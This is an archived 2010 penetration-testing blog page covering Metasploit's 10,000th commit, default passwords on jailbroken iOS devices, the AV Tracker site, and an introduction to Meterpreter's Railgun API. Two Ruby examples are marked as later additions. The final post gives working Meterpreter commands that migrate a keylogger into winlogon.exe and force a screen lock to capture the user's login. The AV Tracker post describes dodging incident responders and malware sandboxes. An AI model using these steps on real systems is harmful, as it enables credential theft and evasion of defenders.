Social Media - Mubix

Friday, Aug 13, 2010

Metasploit turns 10,000


Ask any developer and they will tell you that the age of a project is not calculated in calendar time, but in worker hours or "commits" to a project. The Metasploit Framework hit 10,000 commits today.

With the project dating back to 2003, well before the official "Revision 1" happened, there have been a lot of changes. Going from the initial incarnation as a network "game" written in Perl to the world's largest Ruby project, the framework has seen its fair share of blood, sweat, and tears. With Express out and Pro to come, there will definitely be 10,000 more.

Congratulations to the team, both past and present. What you guys do is extraordinary.


Wednesday, Aug 4, 2010

Jailbreak SSH horrors strike back

Back in 2009 the "ikee" rick-rolling worm went around the iPhone world via the password 'alpine' on the root account. You are now warned to change your root password when you pop into Cydia and Rock the first time. But this thing just won't stay down.

If you have jailbroken your iPad you might want to check out a little file called "master.passwd". In it, there is another user called 'mobile', which has been pointed out since 2008 (here) on the iPhone as another account whose password needs changing. But the media and the Cydia/Rock warnings only put emphasis on 'root'.

Many iPad and iPhone apps STILL do not use the "keyring" and store your password in plain text, or somewhere in a binary file (still plaintext), which the user "mobile" has access to.


Ok, "so what" you say. Since this recent jailbreak was delivered through a website, the individuals running that site now have the IP addresses of freshly jailbroken iPhones and iPads. I am certainly not saying that they have any ill intentions, but sites have been broken into before, and that list would be one hell of a gold mine.

Hopefully AT&T has put in blocks of some sort so that its customers are protected, but who knows what the other carriers around the world that offer iPhones are doing.

But at the very least, if you have jailbroken your iPhone, iPod Touch or iPad, please, please set your passwords accordingly and do not use a simple dictionary password.

Remember, you ARE giving up some security when you jailbreak your phone. It is on you to make sure that you lock back down what you can.

To change your password, use 'Terminal', log in to one account at a time and issue the "passwd" command. You can also just log in as root and issue the "passwd mobile" command to change the password of mobile.
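Since the post's point is that 'mobile' gets missed because everyone only looks at 'root', here is an added audit script (mine, not the post's) that reads a BSD-style master.passwd and lists every account that can actually log in, plus any accounts that share the same password hash. The sample file and its hashes are constructed placeholders, not real iOS values.

```ruby
# Added example: list login-capable accounts in a BSD master.passwd so you know
# which passwords to change after a jailbreak. Field layout (10 fields):
#   name:password:uid:gid:class:change:expire:gecos:home:shell

# Constructed sample resembling an iOS master.passwd; hashes are placeholders.
SAMPLE_MASTER_PASSWD = <<~PW
  nobody:*:-2:-2::0:0:Unprivileged User:/var/empty:/usr/bin/false
  root:PLACEHOLDER_HASH_A:0:0::0:0:System Administrator:/var/root:/bin/sh
  mobile:PLACEHOLDER_HASH_A:501:501::0:0:Mobile User:/var/mobile:/bin/sh
  daemon:*:1:1::0:0:System Services:/var/root:/usr/bin/false
  _sshd:*:75:75::0:0:sshd Privilege separation:/var/empty:/usr/bin/false
PW

NOLOGIN_SHELLS = %w[/usr/bin/false /bin/false /sbin/nologin].freeze

Account = Struct.new(:name, :hash, :uid, :shell) do
  # Login-capable: a usable hash (not locked with * or !) and a real shell.
  def login_capable?
    !hash.empty? && !hash.start_with?("*", "!") && !NOLOGIN_SHELLS.include?(shell)
  end
end

def parse_master_passwd(text)
  text.each_line.map do |line|
    line = line.strip
    next if line.empty? || line.start_with?("#")
    f = line.split(":", -1)
    next unless f.size == 10 # skip malformed lines rather than misreport them
    Account.new(f[0], f[1], Integer(f[2]), f[9])
  end.compact
end

# Names of accounts that need a non-default password set.
def accounts_to_repassword(text)
  parse_master_passwd(text).select(&:login_capable?).map(&:name)
end

# Groups of login-capable accounts sharing one hash (same password and salt),
# which is exactly the root/mobile situation the post describes.
def shared_hash_groups(text)
  parse_master_passwd(text).select(&:login_capable?)
    .group_by(&:hash).values.select { |g| g.size > 1 }.map { |g| g.map(&:name) }
end

if __FILE__ == $0
  puts "Change passwords for: #{accounts_to_repassword(SAMPLE_MASTER_PASSWD).join(', ')}"
  puts "Accounts sharing a hash: #{shared_hash_groups(SAMPLE_MASTER_PASSWD).inspect}"
end
```

On a device, point it at /etc/master.passwd instead of the embedded sample.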

Tuesday, Aug 3, 2010

AV Tracker

Ever set up a multi/handler and get an odd IP hitting it? Probably dismissed it as internet chatter? Think again, you might have just been caught.

AV Tracker ( http://avtracker.info/ ) is a site that tracks the different IP addresses, hostnames, computer names and user agents that AV and other "submit-your-malware-here" drop boxes use.

Peter Kleissner and his team provide:

  • the IP ranges that the hosts use
  • a dynamic text file with the IP addresses listed, if you want to add it to some auto-updating block list
  • a line-by-line iptables block config
  • and even C code to add into your binary to make sure it doesn't talk out from one of those addresses (I could be reading it wrong, still a beginner in C)

The team has been criticized a lot by AV vendors, enough that they took down the site in January of this year. But it came back June 5th.

I use this site to help me know when the incident responders are on to me during my pen testing jobs. I do not wish to get into the debate of how a tool could be used.

Tuesday, Aug 3, 2010

Resources for Railgun development

Metasploit's Railgun is awesome, but getting things to work correctly can be a pain. Here are some of the resources that have helped me out:

  1. System Error Codes – This is hands down the best resource you have; it will tell you what that stupid "5" or "1314" in your return value means. Keep this tab open to circumvent crazed bovine attacks.
  2. theForger's Win32 API Programming Tutorial – A really good place to start when you are getting to know the Windows API and the frustrations that come along with it. I highly recommend going through it first.
  3. MS Windows API Reference – Gigantic, and not the easiest to navigate, but really good for knowing which calls were added with each version of Windows, as well as a basic (alphabetic) list of calls. Good if you know where you are going.
  4. The Undocumented Functions – Win NT/2k/XP/2k3 – A really old link, but it has good references to undocumented functions that have helped circumvent some of the stupidity of other, more complicated functions.
  5. WineAPI Documentation – A great resource on the API calls that mimic the Microsoft ones (undocumented and documented).

Hope this helps and I look forward to seeing what you come up with...


Wednesday, Jul 7, 2010

Intro to Railgun: Win API for Meterpreter

Back on June 13th, "Patrick HVE" released Railgun:

http://mail.metasploit.com/pipermail/framework/2010-June/006382.html

And it was merged into the Metasploit trunk with revisions 9709, 9710, 9711 and 9712:

http://www.metasploit.com/redmine/projects/framework/repository/revisions/9712

Basically, what this allows you to do is make Windows API calls from Meterpreter without compiling your own DLL. It currently supports a number of Windows API DLLs:

  • iphlpapi
  • ws2_32
  • kernel32
  • ntdll
  • user32
  • advapi32

(You can find out exactly which functions are available by default in the api.rb file.)

It's also very extensible. Doesn't have a DLL or function you need? You can read all about adding one in the manual:

./external/source/meterpreter/source/extensions/railgun/railgun_manual.pdf

Here are two examples where this comes in very handy.

List Drives:

The problem I've had on a number of pentests is that you get a shell, but from CMD or Meterpreter there is no good way to find all of the volumes (drives) attached:


  • net use – Shows you which network drives are connected, but not physical ones
  • fsutil fsinfo drives – You must be an administrator to ride this train
  • fdisk /status – Only on OLD versions of DOS; not sure when this disappeared


But Railgun solves this problem with a really short script:


# Load the Railgun extension
client.core.use("railgun")
# Make the API call to enumerate drive letters; the return value is a bitmask,
# bit 0 = A:, bit 1 = B:, ... bit 25 = Z:
a = client.railgun.kernel32.GetLogicalDrives()["return"]
# Math magic to convert the bitmask to letters: strip one bit per pass,
# lowest bit first, and record the letter when that bit was set
drives = []
letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
(0..25).each do |i|
    test = letters[i,1]
    rem = a % (2**(i+1))
    if rem > 0
        drives << test
        a = a - rem
    end
end
print_line("Drives Available = #{drives.inspect}")

Output:
Drives Available = ["A", "C", "D", "P", "X"]

Save this as a Meterpreter script and it'll print every logical drive attached to the system that the current user can see, even as a limited user.

Logical drives include hard disks, network shares, mass storage, optical drives, etc. This opens up the doors to infecting USB sticks and network drives…
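To go one step beyond the letter list and tell fixed disks from removable, network and optical drives, here is an added example (mine, not the post's or Metasploit's) that decodes the GetLogicalDrives bitmask by reading bits directly and classifies each drive with the Win32 GetDriveType return codes. The Railgun call is replaced with a constructed stand-in so the script runs offline; on a live session you would pass a lambda around client.railgun.kernel32.GetDriveTypeA, assuming that function is present in the kernel32 definitions (add it per the manual if not).

```ruby
# Added example: decode GetLogicalDrives and classify drives via GetDriveType.

# Win32 DRIVE_* return values of GetDriveType (from the Windows API reference).
DRIVE_TYPES = {
  0 => :unknown, 1 => :no_root_dir, 2 => :removable,
  3 => :fixed, 4 => :remote, 5 => :cdrom, 6 => :ramdisk
}.freeze

# Bit i of the mask set => drive ('A' + i) exists. Same result as the modulus
# loop in the post, but using Integer#[] to read each bit.
def drive_letters(mask)
  (0..25).select { |i| mask[i] == 1 }.map { |i| ("A".ord + i).chr }
end

# drive_type_lookup: callable taking a root path such as "C:\\" and returning
# the GetDriveType integer. On a live Meterpreter session (assumption: the
# Railgun kernel32 definitions include GetDriveTypeA) you would pass
#   ->(root) { client.railgun.kernel32.GetDriveTypeA(root)["return"] }
def classify_drives(mask, drive_type_lookup)
  drive_letters(mask).to_h do |letter|
    [letter, DRIVE_TYPES.fetch(drive_type_lookup.call("#{letter}:\\"), :unknown)]
  end
end

# Constructed stand-in for the Railgun call, matching the post's sample host:
# A: floppy, C: and D: fixed disks, P: a network share, X: a CD-ROM.
FAKE_TYPES = { "A:\\" => 2, "C:\\" => 3, "D:\\" => 3, "P:\\" => 4, "X:\\" => 5 }.freeze
SAMPLE_MASK = 0b1000_0000_1000_0000_0000_1101 # bits 0,2,3,15,23 => A C D P X

if __FILE__ == $0
  classify_drives(SAMPLE_MASK, ->(root) { FAKE_TYPES.fetch(root, 0) }).each do |l, t|
    puts "#{l}: #{t}"
  end
end
```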


JEDI KEYLOGGING:

One of the problems with keylogging is that you never know when the person will log in, and if you came in via a client-side exploit, they have probably already logged in and you are left hoping they log into a portal or some other password-protected site.

Railgun to the rescue again:

# Start the keylogger running in the background dumping keys every 15 seconds, attached to Winlogon
meterpreter > bgrun keylogrecorder -c 1 -t 15
[*] Executed Meterpreter with Job ID 0
meterpreter > [*]     winlogon.exe Process found, migrating into 640
[*] Migration Successful!!
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf3/logs/scripts/keylogrecorder/192.168.92.122_20100707.4539.txt
[*] Recording

# Drop to IRB to initialize Railgun and lock the workstation, forcing the user to enter their credentials again.

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client

>> client.core.use("railgun")
=> true
>> client.railgun.user32.LockWorkStation()
=> {"GetLastError"=>0, "return"=>true}
>> exit
meterpreter >

Set up "tail -f" on the keylogger's log file, and then kill the keylogger when you've gotten what you came for.

meterpreter > bglist
[*] Job 0: ["keylogrecorder", "-c", "1", "-t", "15"]
meterpreter > bgkill 0
[*] Killing background job 0...
meterpreter >

Hope you have fun with Railgun. Shoot me an email at mubix@hak5.org or leave a comment if you have any other crazy uses for Railgun.